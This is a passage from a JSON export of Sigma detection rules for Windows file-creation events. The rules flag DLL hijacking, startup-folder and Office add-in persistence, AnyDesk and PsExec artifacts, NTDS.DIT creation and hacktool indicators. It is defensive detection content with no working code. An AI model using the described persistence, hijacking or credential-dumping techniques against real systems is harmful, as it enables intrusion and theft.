"creation_date": "2022-09-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_anydesk_writing_susp_binaries.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", "value": "Suspicious Binary Writes Via AnyDesk" }, { "description": "Detects the creation of binaries in the WinSxS folder by non-system processes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_winsxs_binary_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml" ], "tags": [ "attack.execution" ] }, "uuid": "34746e8c-5fb8-415a-b135-0abc167e912a", "value": "WinSxS Executable File Creation By Non-System Process" }, { "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", "value": "Suspicious File Creation In Uncommon AppData Folder" }, { "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_dll_sideloading_space_path.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1552932770464292864", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", "value": "DLL Search Order Hijackig Via Additional Space in Path" }, { "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", "meta": { "author": "@ROxPinTeddy", "creation_date": "2020-05-12", "falsepositive": [ "Legitimate administrative use" ], "filename": "file_event_win_advanced_ip_scanner.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "value": "Advanced IP Scanner - File Event" }, { "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", "meta": { "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2021-10-25", "falsepositive": [ "Legitimate downloads of \".vhd\" files would also trigger this" ], "filename": "file_event_win_vhd_download_via_browsers.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", "value": "VHD Image Download Via Browser" }, { "description": "Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary." ], "filename": "file_event_win_sysinternals_livekd_default_dump_name.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "814ddeca-3d31-4265-8e07-8cc54fb44903", "value": "LiveKD Kernel Memory Dump File Created" }, { "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "meta": { "author": "frack113", "creation_date": "2021-12-29", "falsepositive": [ "Unknown" ], "filename": "file_event_win_creation_scr_binary_file.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" ], "tags": [ "attack.persistence", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", "value": "Suspicious Screensaver Binary File Creation" }, { "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", "meta": { "author": "frack113", "creation_date": "2022-06-08", "falsepositive": [ "Legitimate microsoft diagcab" ], "filename": "file_event_win_susp_diagcab.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://threadreaderapp.com/thread/1533879688141086720.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" ], "tags": [ "attack.resource-development" ] }, "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", "value": "Creation of a Diagcab" }, { "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unknown" ], "filename": "file_event_win_lolbin_gather_network_info_script_output.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "f92a6f1e-a512-4a15-9735-da09e78d7273", "value": "GatherNetworkInfo.VBS Reconnaissance Script Output" }, { "description": "Detects default RemCom service filename which indicates RemCom service installation and execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-04", "falsepositive": [ "Unknown" ], "filename": "file_event_win_remcom_service.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/kavika13/RemCom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remcom_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7eff1a7f-dd45-4c20-877a-f21e342a7611", "value": "RemCom Service File Creation" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate use" ], "filename": "file_event_win_anydesk_artefact.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", "value": "Anydesk Temporary Artefact" }, { "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", "meta": { "author": "frack113", "creation_date": "2022-01-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_colorcpl.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1480468728324231172?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "value": "Suspicious Creation with Colorcpl" }, { "description": "Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-27", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_hktl_krbrelay_remote_ioc.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ab79e90-9fab-4cdf-a7b2-6522bc742adb", "value": "HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators" }, { "description": "Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Some false positives may occur with legitimate renamed process monitor binaries" ], "filename": "file_event_win_sysinternals_procmon_driver_susp_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a05baa88-e922-4001-bc4d-8738135f27de", "value": "Process Monitor Driver Creation By Non-Sysinternals Binary" }, { "description": "Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.", "meta": { "author": "Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-02", "falsepositive": [ "Loading a user environment from a backup or a domain controller", "Synchronization of templates" ], "filename": "file_event_win_office_startup_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders", "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", "value": "Potential Persistence Via Microsoft Office Startup Folder" }, { "description": "Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\nHack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Some false positives may occur with legitimate renamed process explorer binaries" ], "filename": "file_event_win_sysinternals_procexp_driver_susp_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer", "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/", "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks", "https://github.com/Yaxser/Backstab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de46c52b-0bf8-4936-a327-aace94f94ac6", "value": "Process Explorer Driver Creation By Non-Sysinternals Binary" }, { "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", "meta": { "author": "frack113", "creation_date": "2022-05-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_werfault_dll_hijacking.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1574.001" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "value": "Creation of an WerFault.exe in Unusual Folder" }, { "description": "Detects file writes of WMI script event consumer", "meta": { "author": "Thomas Patzke", "creation_date": "2018-03-07", "falsepositive": [ "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" ], "tags": [ "attack.t1546.003", "attack.persistence" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "value": "WMI Persistence - Script Event Consumer File Write" }, { "description": "Detects when a file with a suspicious extension is created in the startup folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Rare legitimate usage of some of the extensions mentioned in the rule" ], "filename": "file_event_win_susp_startup_folder_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/last-byte/PersistenceSniper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", "value": "Suspicious Startup Folder Persistence" }, { "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "filename": "file_event_win_startup_folder_file_write.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/12", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", "value": "Startup Folder File Write" }, { "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_sysinternals_psexec_service.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "value": "PsExec Service File Creation" }, { "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", "meta": { "author": "NVISO", "creation_date": "2020-05-11", "falsepositive": [ "Legitimate add-ins" ], "filename": "file_event_win_office_addin_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md", "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1137.006" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "value": "Potential Persistence Via Microsoft Office Add-In" }, { "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "filename": "file_event_win_office_onenote_files_in_susp_locations.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "value": "OneNote Attachment File Dropped In Suspicious Location" }, { "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", "meta": { "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "creation_date": "2022-11-18", "falsepositive": [ "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "filename": "file_event_win_net_cli_artefact.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "value": "Suspicious DotNET CLR Usage Log Artifact" }, { "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_dit_creation.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b8baa3f-575c-46ee-8715-d6f28cc7d33c", "value": "NTDS.DIT Created" }, { "description": "Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "1027d292-dd87-4a1a-8701-2abe04d7783c", "value": "PSScriptPolicyTest Creation By Uncommon Process" }, { "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", "meta": { "author": "Alexander Rausch", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "file_event_win_redmimicry_winnti_filedrop.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redmimicry.com/posts/redmimicry-winnti/#dropper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "value": "Potential Winnti Dropper Activity" }, { "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-18", "falsepositive": [ "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "filename": "file_event_win_wpbbin_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/wpbbin.html", "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1542.001" ] }, "related": [ { "dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "value": "UEFI Persistence Via Wpbbin - FileCreation" }, { "description": "Detects the creation of a file with the \".pdf\" extension by the \"RegEdit.exe\" process.\nThis indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-08", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_regedit_print_as_pdf.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_regedit_print_as_pdf.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "145095eb-e273-443b-83d0-f9b519b7867b", "value": "PDF File Created By RegEdit.EXE" }, { "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc. by a non-PowerShell process", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_powershell_module_uncommon_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e3845023-ca9a-4024-b2b2-5422156d5527", "value": "PowerShell Module File Created By Non-PowerShell Process" }, { "description": "Detects processes creating temp files related to PCRE.NET package", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "file_event_win_pcre_net_temp_file.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/rbmaslen/status/1321859647091970051", "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "value": "PCRE.NET Package Temp Files" }, { "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_dcom_iertutil_dll_hijack.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": 